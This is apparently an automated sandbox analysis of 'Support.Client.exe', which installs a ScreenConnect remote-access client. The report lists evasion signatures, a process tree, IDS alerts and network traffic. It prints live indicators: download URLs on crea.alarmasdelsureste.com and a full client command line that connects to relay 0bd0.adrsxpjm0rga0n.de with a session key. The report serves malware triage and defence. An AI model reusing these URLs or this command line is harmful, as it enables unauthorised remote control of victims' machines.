Windows Analysis Report
Support.Client.exe

Overview

General Information

Sample name:Support.Client.exe
Analysis ID:1579450
MD5:35981eb47ca481b1cc8f4495da53685f
SHA1:8d5601de3cfc67aca5748f50ddf9f6e63de708ce
SHA256:32694b10b3f04d250b82cce2fc909dc70b074b060407b5ded5355e66f2793aa6
Tags:exe, user-windshock
Infos:

Detection

ScreenConnect Tool
Score:57
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:33
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Detected potential unwanted application
Enables network access during safeboot for specific services
Reads the Security eventlog
Reads the System eventlog
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
One or more processes crash
PE file contains an invalid checksum
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64
  • Support.Client.exe (PID: 7568 cmdline: "C:\Users\user\Desktop\Support.Client.exe" MD5: 35981EB47CA481B1CC8F4495DA53685F)
    • dfsvc.exe (PID: 7604 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe" MD5: B4088F44B80D363902E11F897A7BAC09)
      • ScreenConnect.WindowsClient.exe (PID: 1216 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe" MD5: 20AB8141D958A58AADE5E78671A719BF)
        • ScreenConnect.ClientService.exe (PID: 2944 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=0bd0.adrsxpjm0rga0n.de&p=8041&s=12a62791-f49c-4806-9cc2-0b20f2ce6bb8&k=BgIAAACkAABSU0ExAAgAAAEAAQBdRYPv%2fs%2bijGK1u%2flkqPsG%2bdG7F%2f4ax8QNSH9Yo6i7A6UZdAY2kZfgAMhSjF%2fKrmKc4KX%2fDk9ZtiCRIRrmQh3eoku1a3oxQ2phk099M%2brHxm%2fsY2PWCCL%2fy3eISyDDs8dYSd7NyaWC%2bZQBDk%2bCMboNgHDqg5TZ2DZSQbH4e9PpCOhBmemQ0OLPi7s6np%2fBxp4rKNbDymsYFM0a6KINC%2bdchq29F%2bXHGl%2fK%2fQmGvHtdIpX8%2bO%2fTtZQDOLPXW57J20w3ypOH%2bHf7phXvddrwOTzrArQoTCReWUatoySRLumG3cOPSFHex5FRYf45W%2bMRD4DXmWP56lW1jk7oCGLWlFHE&r=&i=Untitled%20Session" "1" MD5: 361BCC2CB78C75DD6F583AF81834E447)
    • WerFault.exe (PID: 7764 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7568 -s 884 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 7664 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 7700 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 7568 -ip 7568 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 7784 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • ScreenConnect.ClientService.exe (PID: 3020 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=0bd0.adrsxpjm0rga0n.de&p=8041&s=12a62791-f49c-4806-9cc2-0b20f2ce6bb8&k=BgIAAACkAABSU0ExAAgAAAEAAQBdRYPv%2fs%2bijGK1u%2flkqPsG%2bdG7F%2f4ax8QNSH9Yo6i7A6UZdAY2kZfgAMhSjF%2fKrmKc4KX%2fDk9ZtiCRIRrmQh3eoku1a3oxQ2phk099M%2brHxm%2fsY2PWCCL%2fy3eISyDDs8dYSd7NyaWC%2bZQBDk%2bCMboNgHDqg5TZ2DZSQbH4e9PpCOhBmemQ0OLPi7s6np%2fBxp4rKNbDymsYFM0a6KINC%2bdchq29F%2bXHGl%2fK%2fQmGvHtdIpX8%2bO%2fTtZQDOLPXW57J20w3ypOH%2bHf7phXvddrwOTzrArQoTCReWUatoySRLumG3cOPSFHex5FRYf45W%2bMRD4DXmWP56lW1jk7oCGLWlFHE&r=&i=Untitled%20Session" "1" MD5: 361BCC2CB78C75DD6F583AF81834E447)
    • ScreenConnect.WindowsClient.exe (PID: 7560 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe" "RunRole" "f96fdd58-b31b-40b0-b300-0e1ead05a7df" "User" MD5: 20AB8141D958A58AADE5E78671A719BF)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

Source | Rule | Description | Author | Strings
00000009.00000000.2124711251.0000000000A32000.00000002.00000001.01000000.0000000B.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000001.00000002.2525404173.00000251406A3000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000009.00000002.2135937329.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
Process Memory Space: dfsvc.exe PID: 7604 | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
Process Memory Space: ScreenConnect.WindowsClient.exe PID: 1216 | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

Source | Rule | Description | Author | Strings
9.0.ScreenConnect.WindowsClient.exe.a30000.0.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

                  System Summary

                  Source: Network Connection | Author: Nasreddine Bencherchali (Nextron Systems) | Data: DestinationIp: 192.168.2.4, DestinationIsIpv6: false, DestinationPort: 49731, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Initiated: true, ProcessId: 7604, Protocol: tcp, SourceIp: 104.168.134.232, SourceIsIpv6: false, SourcePort: 443
                  Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 7664, ProcessName: svchost.exe
                  Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                  2024-12-22T12:47:14.594623+0100 | 2009897 | 1 | A Network Trojan was detected | 104.168.134.232 | 443 | 192.168.2.4 | 49748 | TCP
                  2024-12-22T12:47:16.941092+0100 | 2009897 | 1 | A Network Trojan was detected | 104.168.134.232 | 443 | 192.168.2.4 | 49750 | TCP
                  2024-12-22T12:47:25.014789+0100 | 2009897 | 1 | A Network Trojan was detected | 104.168.134.232 | 443 | 192.168.2.4 | 49756 | TCP
                  2024-12-22T12:47:27.353673+0100 | 2009897 | 1 | A Network Trojan was detected | 104.168.134.232 | 443 | 192.168.2.4 | 49758 | TCP
                  2024-12-22T12:47:30.011230+0100 | 2009897 | 1 | A Network Trojan was detected | 104.168.134.232 | 443 | 192.168.2.4 | 49760 | TCP
                  2024-12-22T12:47:32.707382+0100 | 2009897 | 1 | A Network Trojan was detected | 104.168.134.232 | 443 | 192.168.2.4 | 49762 | TCP
                  2024-12-22T12:47:37.091079+0100 | 2009897 | 1 | A Network Trojan was detected | 104.168.134.232 | 443 | 192.168.2.4 | 49763 | TCP
                  2024-12-22T12:47:40.347990+0100 | 2009897 | 1 | A Network Trojan was detected | 104.168.134.232 | 443 | 192.168.2.4 | 49764 | TCP

                  AV Detection

                  Source: Support.Client.exe | Virustotal: Detection: 20%
                  Source: Submitted Sample | Integrated Neural Analysis Model: Matched 94.0% probability
                  Source: C:\Users\user\Desktop\Support.Client.exe | Code function: 0_2_00C01000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00C01000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | EXE: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | EXE: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | EXE: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | EXE: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe

                  Compliance

                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | EXE: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | EXE: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | EXE: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | EXE: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe
                  Source: Support.Client.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: Support.Client.exe | Static PE information: certificate valid
                  Source: unknown | HTTPS traffic detected: 104.168.134.232:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 104.168.134.232:443 -> 192.168.2.4:49748 version: TLS 1.2
                  Source: Support.Client.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000001.00000002.2525404173.000002514097C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140A4D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.00000251405FE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.000002514077B000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2135607585.0000000001272000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: Support.Client.exe
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.2525404173.0000025140AB0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140978000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.000002514077B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.00000251405FA000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.2133716671.0000000002DA2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000C.00000002.2946951475.000000001B400000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000C.00000002.2939873486.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2124711251.0000000000A32000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000000.2129224859.000000000021D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.2525404173.0000025140AD9000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140974000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.000002514077B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.00000251405F6000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2138587457.000000001BDE2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2124711251.0000000000A32000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: dfsvc.exe, 00000001.00000002.2525404173.0000025140AD9000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140974000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.000002514077B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.00000251405F6000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2138587457.000000001BDE2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.2525404173.000002514097C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140A4D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.00000251405FE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.000002514077B000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2135607585.0000000001272000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.2525404173.000002514077B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140449000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.2134375244.0000000005242000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe | File opened: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe | File opened: C:\Users\user\AppData\Local\Apps\2.0\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe | File opened: C:\Users\user\AppData\Local\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe | File opened: C:\Users\user\AppData\Local\Apps\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe | File opened: C:\Users\user\AppData\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe | File opened: C:\Users\user\

                  Networking

                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe | Registry value created: NULL Service
                  Source: global traffic | TCP traffic: 192.168.2.4:49766 -> 104.168.134.232:8041
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=0bd0.adrsxpjm0rga0n.de&p=8041&s=12a62791-f49c-4806-9cc2-0b20f2ce6bb8&k=BgIAAACkAABSU0ExAAgAAAEAAQBdRYPv%2fs%2bijGK1u%2flkqPsG%2bdG7F%2f4ax8QNSH9Yo6i7A6UZdAY2kZfgAMhSjF%2fKrmKc4KX%2fDk9ZtiCRIRrmQh3eoku1a3oxQ2phk099M%2brHxm%2fsY2PWCCL%2fy3eISyDDs8dYSd7NyaWC%2bZQBDk%2bCMboNgHDqg5TZ2DZSQbH4e9PpCOhBmemQ0OLPi7s6np%2fBxp4rKNbDymsYFM0a6KINC%2bdchq29F%2bXHGl%2fK%2fQmGvHtdIpX8%2bO%2fTtZQDOLPXW57J20w3ypOH%2bHf7phXvddrwOTzrArQoTCReWUatoySRLumG3cOPSFHex5FRYf45W%2bMRD4DXmWP56lW1jk7oCGLWlFHE&r=&i=Untitled%20Session HTTP/1.1 | Host: crea.alarmasdelsureste.com | Accept-Encoding: gzip | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1 | Host: crea.alarmasdelsureste.com | Accept-Encoding: gzip
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1 | Host: crea.alarmasdelsureste.com | Accept-Encoding: gzip | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1 | Host: crea.alarmasdelsureste.com | Accept-Encoding: gzip
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1 | Host: crea.alarmasdelsureste.com | Accept-Encoding: gzip | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1 | Host: crea.alarmasdelsureste.com | Accept-Encoding: gzip
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1 | Host: crea.alarmasdelsureste.com | Accept-Encoding: gzip | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1 | Host: crea.alarmasdelsureste.com | Accept-Encoding: gzip
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1 | Host: crea.alarmasdelsureste.com | Accept-Encoding: gzip | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1 | Host: crea.alarmasdelsureste.com | Accept-Encoding: gzip | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1 | Host: crea.alarmasdelsureste.com | Accept-Encoding: gzip | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1 | Host: crea.alarmasdelsureste.com | Accept-Encoding: gzip | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1 | Host: crea.alarmasdelsureste.com | Accept-Encoding: gzip | Connection: Keep-Alive
                  Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Network traffic | Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 104.168.134.232:443 -> 192.168.2.4:49748
                  Source: Network traffic | Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 104.168.134.232:443 -> 192.168.2.4:49758
                  Source: Network traffic | Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 104.168.134.232:443 -> 192.168.2.4:49756
                  Source: Network traffic | Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 104.168.134.232:443 -> 192.168.2.4:49750
                  Source: Network traffic | Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 104.168.134.232:443 -> 192.168.2.4:49762
                  Source: Network traffic | Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 104.168.134.232:443 -> 192.168.2.4:49763
                  Source: Network traffic | Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 104.168.134.232:443 -> 192.168.2.4:49760
                  Source: Network traffic | Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 104.168.134.232:443 -> 192.168.2.4:49764
                  Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global traffic | DNS traffic detected: DNS query: crea.alarmasdelsureste.com
                  Source: global traffic | DNS traffic detected: DNS query: 0bd0.adrsxpjm0rga0n.de
                  Source: Support.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: C56C4404C4DEF0DC88E5FCD9F09CB2F10.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt
                  Source: Support.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                  Source: Support.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: F2E248BEDDBB2D85122423C41028BFD4.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
                  Source: Support.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.1.dr, ScreenConnect.ClientService.exe.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
